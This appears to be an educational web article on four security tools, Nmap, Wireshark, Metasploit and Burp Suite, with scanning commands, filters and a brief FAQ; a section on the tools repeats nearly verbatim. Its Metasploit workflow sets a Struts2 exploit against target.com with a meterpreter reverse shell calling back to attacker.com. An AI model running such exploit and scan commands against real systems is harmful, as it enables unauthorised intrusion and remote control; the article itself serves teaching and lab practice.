Cybersecurity Tools: Nmap, Wireshark, Metasploit, and Burp Suite
Security professionals rely on a toolkit of specialized software for testing, monitoring, and defending systems. Four tools stand out as essential for anyone working in cybersecurity: Nmap, Wireshark, Metasploit, and Burp Suite. Mastering these tools provides a strong foundation for both offensive and defensive security work.
Nmap: Network Discovery and Scanning
Nmap (Network Mapper) is the standard tool for network discovery and security auditing. It identifies devices running on a network, discovers open ports, detects operating systems, and determines service versions.
Basic Scanning
# Ping scan — discover live hosts
nmap -sn 192.168.1.0/24
# Port scan — find open ports on a target
nmap target.com
# Service version detection
nmap -sV target.com
# OS detection
nmap -O target.comAdvanced Techniques
Nmap supports multiple scan types. TCP SYN scan (-sS) is the stealthy default, sending SYN packets and analyzing responses without completing TCP handshakes. TCP connect scan (-sT) completes full connections. UDP scan (-sU) probes UDP ports, which are often overlooked but can reveal critical services like DNS and SNMP.
Nmap Scripting Engine (NSE) extends Nmap with automated vulnerability detection:
# Run all safe scripts
nmap -sV --script safe target.com
# Check for specific vulnerabilities
nmap --script http-sql-injection target.comNSE includes hundreds of scripts for vulnerability detection, brute forcing, service discovery, and exploitation. Writing custom NSE scripts allows automation of repetitive testing tasks.
Output and Reporting
# Save results in multiple formats
nmap -oA scan_results target.comNmap generates normal, XML, grepable, and script kiddie output formats. XML output integrates with other tools for further analysis and reporting.
Wireshark: Network Traffic Analysis
Wireshark captures and inspects network packets in real time. It is essential for understanding network protocols, diagnosing issues, and investigating security incidents.
Capturing Traffic
Wireshark captures packets from network interfaces. Apply capture filters to limit what is collected — capturing everything on a busy network generates enormous data volumes. Use display filters after capture for detailed analysis.
Essential Display Filters
http — show only HTTP traffic
tcp.port == 443 — filter by port
ip.addr == 10.0.0.1 — filter by IP address
http.request.method == POST — specific requests
tls.handshake.type == 1 — TLS client hellos
dns.qry.name contains "malware" — DNS queriesAnalyzing Security Events
Wireshark reveals security-relevant patterns. Follow TCP streams to reconstruct conversations. Examine TLS handshakes for certificate issues. Identify DNS queries to known malicious domains. Detect ARP spoofing. Identify brute force attempts through repeated authentication packets.
Wireshark’s protocol dissectors understand hundreds of protocols, making it invaluable for analyzing custom or legacy protocols that other tools do not support.
Metasploit: Exploitation Framework
Metasploit is the most widely used exploitation framework. It provides a comprehensive environment for developing, testing, and executing exploits against target systems.
Core Components
Metasploit includes thousands of tested exploits organized by target platform and service. Payloads define what happens after successful exploitation — reverse shells, meterpreter, bind shells, command execution. Auxiliary modules handle scanning, fuzzing, and denial of service without exploitation.
Basic Workflow
msf6 > search apache
msf6 > use exploit/multi/http/struts2_rest_xstream
msf6 > set RHOSTS target.com
msf6 > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 > set LHOST attacker.com
msf6 > exploitPost-exploitation modules collect system information, dump credentials, capture keystrokes, pivot to other hosts, and maintain access. Meterpreter provides an extensible command shell with built-in post-exploitation capabilities.
Limitations
Metasploit’s exploits target known vulnerabilities. It is not effective against fully patched systems. Modern EDR solutions detect many Metasploit payloads. Professional testers use Metasploit as one tool among many, not their entire methodology.
Burp Suite: Web Application Testing
Burp Suite is the standard platform for web application security testing. It intercepts, inspects, and modifies HTTP traffic between browser and server.
Proxy
Burp’s intercepting proxy captures HTTP requests and responses for inspection and modification. Configure your browser to route traffic through Burp, then examine and manipulate every request. This reveals how the application handles unexpected input.
Scanner
Burp Scanner automatically identifies common web vulnerabilities — SQL injection, XSS, CSRF, XXE, and more. It combines passive scanning (analyzing traffic without sending additional requests) with active scanning (sending crafted payloads to probe for vulnerabilities).
Repeater and Intruder
Repeater resends individual requests with manual modifications, useful for testing specific parameters. Intruder automates customized attacks — brute force, parameter fuzzing, payload testing — with configurable payload positions and attack types.
Extensions
Burp’s extension ecosystem adds functionality. Popular extensions include JSON Web Token handling, GraphQL support, and collaboration with other tools.
Building Your Toolkit
These four tools are just the beginning. Expand your toolkit based on your specialization. Web application testers need directory busters (gobuster, ffuf), vulnerability scanners (Nikto, OpenVAS), and exploitation tools beyond Metasploit. Network defenders need SIEM platforms, endpoint detection tools, and threat intelligence platforms.
Practice these tools in legal environments. HackTheBox, TryHackMe, and virtual labs provide safe practice. The goal is not tool memorization but understanding the principles behind each tool — what it does, how it works, and when to use it. Tools change, but methodology endures.
Network Security Tools
Nmap
Nmap is the standard tool for network discovery and port scanning. It can identify live hosts, open ports, running services, operating systems, and firewall configurations:
# Basic port scan
nmap -sS -p- 192.168.1.1
# Service version detection
nmap -sV 192.168.1.0/24
# OS fingerprinting
nmap -O target.comNSE (Nmap Scripting Engine) extends Nmap with hundreds of scripts for vulnerability detection, brute force attacks, and service enumeration.
Wireshark
Wireshark captures and analyzes network traffic at the packet level. Master key features like display filters (http.request, tcp.port==443), follow TCP streams, and export objects from HTTP traffic. Use it to diagnose network issues, analyze malicious traffic, and understand protocol behavior.
Burp Suite
Burp Suite is the standard web application security testing tool. Its proxy captures and modifies HTTP/S traffic between browser and server. Key features include:
- Repeater — Manually craft and resend requests
- Intruder — Automated parameter fuzzing
- Scanner — Automated vulnerability detection (Pro only)
- Decoder — Encoding/decoding data
Metasploit Framework
Metasploit provides exploit development and execution capabilities. While often associated with offensive security, it is equally valuable for defenders to understand attack paths and test detection capabilities.
Defensive Tools
On the defensive side, understand tools like Snort/Suricata (IDS/IPS), OSSEC (HIDS), Wazuh (SIEM), and OpenVAS (vulnerability scanning). Building a SIEM lab with the ELK stack (Elasticsearch, Logstash, Kibana) provides hands-on experience with security monitoring and alerting.
FAQ
What is the CIA triad? Confidentiality (data accessible only to authorized parties), Integrity (data not tampered with), Availability (systems accessible when needed). These three principles form the foundation of all cybersecurity practices.
How do I start a career in cybersecurity? Learn networking, operating systems, and basic security concepts. Set up a home lab. Earn entry-level certifications like CompTIA Security+. Build hands-on skills through CTF challenges and bug bounty programs.
What is the difference between a vulnerability and an exploit? A vulnerability is a weakness in a system that could be exploited. An exploit is code or technique that takes advantage of a vulnerability to cause unintended behavior.
How often should I change my passwords? Current guidance recommends strong, unique passwords for each account and a password manager. Change passwords immediately if you suspect compromise rather than on a fixed schedule.
What is multi-factor authentication? MFA requires two or more verification factors — typically something you know (password), something you have (phone), and something you are (fingerprint). It dramatically reduces account takeover risk.
Network Security Tools
Nmap
Nmap is the standard tool for network discovery and port scanning. It can identify live hosts, open ports, running services, operating systems, and firewall configurations:
# Basic port scan
nmap -sS -p- 192.168.1.1
# Service version detection
nmap -sV 192.168.1.0/24
# OS fingerprinting
nmap -O target.comNSE (Nmap Scripting Engine) extends Nmap with hundreds of scripts for vulnerability detection, brute force attacks, and service enumeration.
Wireshark
Wireshark captures and analyzes network traffic at the packet level. Master key features like display filters (http.request, tcp.port==443), follow TCP streams, and export objects from HTTP traffic. Use it to diagnose network issues, analyze malicious traffic, and understand protocol behavior.
Burp Suite
Burp Suite is the standard web application security testing tool. Its proxy captures and modifies HTTP/S traffic between browser and server. Key features include:
- Repeater — Manually craft and resend requests
- Intruder — Automated parameter fuzzing
- Scanner — Automated vulnerability detection (Pro only)
- Decoder — Encoding/decoding data
Metasploit Framework
Metasploit provides exploit development and execution capabilities. While often associated with offensive security, it is equally valuable for defenders to understand attack paths and test detection capabilities.
Defensive Tools
On the defensive side, understand tools like Snort/Suricata (IDS/IPS), OSSEC (HIDS), Wazuh (SIEM), and OpenVAS (vulnerability scanning). Building a SIEM lab with the ELK stack (Elasticsearch, Logstash, Kibana) provides hands-on experience with security monitoring and alerting.
For a comprehensive overview, read our article on Cloud Security Architecture.
For a comprehensive overview, read our article on Cloud Security Guide.